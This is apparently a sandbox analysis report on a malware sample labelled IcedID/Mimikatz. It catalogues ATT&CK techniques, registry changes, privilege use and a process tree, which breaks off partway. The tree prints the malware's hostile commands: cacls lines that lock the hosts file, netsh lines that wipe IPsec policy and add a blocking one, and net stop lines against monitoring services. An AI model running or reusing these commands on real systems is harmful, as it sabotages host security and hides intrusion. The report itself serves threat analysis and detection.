Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

net1.exenet.exenetsh.exenetsh.execmd.execmd.exenet.exenetsh.execmd.exesc.execmd.exenetsh.exenet.exefknvgk.execmd.exenet1.exeschtasks.exenet1.execacls.exenetsh.execmd.execmd.exeschtasks.execmd.execmd.exenetsh.execmd.execmd.exewpcap.exenet.exenet1.execmd.exenetsh.exenet.exenet.exevmlbqggye.exeyittybr.exeyittybr.execacls.exenetsh.exenet1.exenetsh.execmd.execmd.exenet1.exenet.execmd.exebjfisnrbq.exenetsh.exenetsh.exenetsh.exenet1.execmd.exenet1.exexohudmc.execmd.execacls.exenet.exenetsh.exenetsh.exenetsh.exesc.execmd.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fknvgk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vmlbqggye.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yittybr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yittybr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bjfisnrbq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exePING.EXE

pid	Process
216	cmd.exe
3380	PING.EXE

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023c87-6.dat	nsis_installer_2
behavioral2/files/0x0008000000023ca4-15.dat	nsis_installer_1
behavioral2/files/0x0008000000023ca4-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 43 IoCs

Processes:

btjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exeyittybr.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	yittybr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	yittybr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	yittybr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	yittybr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	yittybr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	yittybr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	btjlhtrlh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	btjlhtrlh.exe

Modifies registry class 14 IoCs

Processes:

yittybr.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	yittybr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	yittybr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	yittybr.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
3380	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
1200	schtasks.exe
4852	schtasks.exe
5068	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

yittybr.exe

pid	Process
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe

Suspicious behavior: LoadsDriver 15 IoCs

Processes:

pid	Process
660
660
660
660
660
660
660
660
660
660
660
660
660
660
660

Suspicious behavior: RenamesItself 1 IoCs

Processes:

2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe

pid	Process
3232	2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exeyittybr.exeyittybr.exevfshost.exebtjlhtrlh.exettlnnh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exe

description	pid	Process
Token: SeDebugPrivilege	3232	2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	1252	yittybr.exe
Token: SeDebugPrivilege	4064	yittybr.exe
Token: SeDebugPrivilege	3972	vfshost.exe
Token: SeDebugPrivilege	3404	btjlhtrlh.exe
Token: SeLockMemoryPrivilege	3672	ttlnnh.exe
Token: SeLockMemoryPrivilege	3672	ttlnnh.exe
Token: SeDebugPrivilege	4932	btjlhtrlh.exe
Token: SeDebugPrivilege	1112	btjlhtrlh.exe
Token: SeDebugPrivilege	1732	btjlhtrlh.exe
Token: SeDebugPrivilege	2284	btjlhtrlh.exe
Token: SeDebugPrivilege	1468	btjlhtrlh.exe
Token: SeDebugPrivilege	216	btjlhtrlh.exe
Token: SeDebugPrivilege	4900	btjlhtrlh.exe
Token: SeDebugPrivilege	3824	btjlhtrlh.exe
Token: SeDebugPrivilege	3156	btjlhtrlh.exe
Token: SeDebugPrivilege	512	btjlhtrlh.exe
Token: SeDebugPrivilege	4168	btjlhtrlh.exe
Token: SeDebugPrivilege	2484	btjlhtrlh.exe
Token: SeDebugPrivilege	4960	btjlhtrlh.exe
Token: SeDebugPrivilege	1708	btjlhtrlh.exe
Token: SeDebugPrivilege	5100	btjlhtrlh.exe
Token: SeDebugPrivilege	3572	btjlhtrlh.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exeyittybr.exeyittybr.exexohudmc.exefknvgk.exeyittybr.exeyittybr.exe

pid	Process
3232	2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe
3232	2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe
1252	yittybr.exe
1252	yittybr.exe
4064	yittybr.exe
4064	yittybr.exe
4476	xohudmc.exe
3972	fknvgk.exe
4624	yittybr.exe
4624	yittybr.exe
1012	yittybr.exe
1012	yittybr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.execmd.exeyittybr.execmd.execmd.exewpcap.exenet.exenet.exenet.exe

description	pid	Process	procid_target
PID 3232 wrote to memory of 216	3232	2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe	82
PID 3232 wrote to memory of 216	3232	2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe	82
PID 3232 wrote to memory of 216	3232	2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe	82
PID 216 wrote to memory of 3380	216	cmd.exe	84
PID 216 wrote to memory of 3380	216	cmd.exe	84
PID 216 wrote to memory of 3380	216	cmd.exe	84
PID 216 wrote to memory of 1252	216	cmd.exe	89
PID 216 wrote to memory of 1252	216	cmd.exe	89
PID 216 wrote to memory of 1252	216	cmd.exe	89
PID 4064 wrote to memory of 4796	4064	yittybr.exe	92
PID 4064 wrote to memory of 4796	4064	yittybr.exe	92
PID 4064 wrote to memory of 4796	4064	yittybr.exe	92
PID 4796 wrote to memory of 3156	4796	cmd.exe	94
PID 4796 wrote to memory of 3156	4796	cmd.exe	94
PID 4796 wrote to memory of 3156	4796	cmd.exe	94
PID 4796 wrote to memory of 4792	4796	cmd.exe	95
PID 4796 wrote to memory of 4792	4796	cmd.exe	95
PID 4796 wrote to memory of 4792	4796	cmd.exe	95
PID 4796 wrote to memory of 3716	4796	cmd.exe	96
PID 4796 wrote to memory of 3716	4796	cmd.exe	96
PID 4796 wrote to memory of 3716	4796	cmd.exe	96
PID 4796 wrote to memory of 4168	4796	cmd.exe	97
PID 4796 wrote to memory of 4168	4796	cmd.exe	97
PID 4796 wrote to memory of 4168	4796	cmd.exe	97
PID 4796 wrote to memory of 2952	4796	cmd.exe	98
PID 4796 wrote to memory of 2952	4796	cmd.exe	98
PID 4796 wrote to memory of 2952	4796	cmd.exe	98
PID 4796 wrote to memory of 4952	4796	cmd.exe	99
PID 4796 wrote to memory of 4952	4796	cmd.exe	99
PID 4796 wrote to memory of 4952	4796	cmd.exe	99
PID 4064 wrote to memory of 4992	4064	yittybr.exe	102
PID 4064 wrote to memory of 4992	4064	yittybr.exe	102
PID 4064 wrote to memory of 4992	4064	yittybr.exe	102
PID 4064 wrote to memory of 848	4064	yittybr.exe	104
PID 4064 wrote to memory of 848	4064	yittybr.exe	104
PID 4064 wrote to memory of 848	4064	yittybr.exe	104
PID 4064 wrote to memory of 2896	4064	yittybr.exe	106
PID 4064 wrote to memory of 2896	4064	yittybr.exe	106
PID 4064 wrote to memory of 2896	4064	yittybr.exe	106
PID 4064 wrote to memory of 4940	4064	yittybr.exe	110
PID 4064 wrote to memory of 4940	4064	yittybr.exe	110
PID 4064 wrote to memory of 4940	4064	yittybr.exe	110
PID 4940 wrote to memory of 1924	4940	cmd.exe	112
PID 4940 wrote to memory of 1924	4940	cmd.exe	112
PID 4940 wrote to memory of 1924	4940	cmd.exe	112
PID 1924 wrote to memory of 3276	1924	wpcap.exe	113
PID 1924 wrote to memory of 3276	1924	wpcap.exe	113
PID 1924 wrote to memory of 3276	1924	wpcap.exe	113
PID 3276 wrote to memory of 3912	3276	net.exe	115
PID 3276 wrote to memory of 3912	3276	net.exe	115
PID 3276 wrote to memory of 3912	3276	net.exe	115
PID 1924 wrote to memory of 3572	1924	wpcap.exe	116
PID 1924 wrote to memory of 3572	1924	wpcap.exe	116
PID 1924 wrote to memory of 3572	1924	wpcap.exe	116
PID 3572 wrote to memory of 4912	3572	net.exe	118
PID 3572 wrote to memory of 4912	3572	net.exe	118
PID 3572 wrote to memory of 4912	3572	net.exe	118
PID 1924 wrote to memory of 4472	1924	wpcap.exe	119
PID 1924 wrote to memory of 4472	1924	wpcap.exe	119
PID 1924 wrote to memory of 4472	1924	wpcap.exe	119
PID 4472 wrote to memory of 4808	4472	net.exe	121
PID 4472 wrote to memory of 4808	4472	net.exe	121
PID 4472 wrote to memory of 4808	4472	net.exe	121
PID 1924 wrote to memory of 3412	1924	wpcap.exe	122

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2236
- C:\Windows\TEMP\lntjubmbe\ttlnnh.exe
  "C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3672

C:\Users\Admin\AppData\Local\Temp\2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-26_b92fa8e500704b2c39dabdc2665ac9fb_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tllefmnq\yittybr.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3380
- - C:\Windows\tllefmnq\yittybr.exe
    C:\Windows\tllefmnq\yittybr.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1252

C:\Windows\tllefmnq\yittybr.exe
C:\Windows\tllefmnq\yittybr.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3156
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3716
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4952
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4992
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:848
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4940
- - C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe
    C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1924
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3912
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3572
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
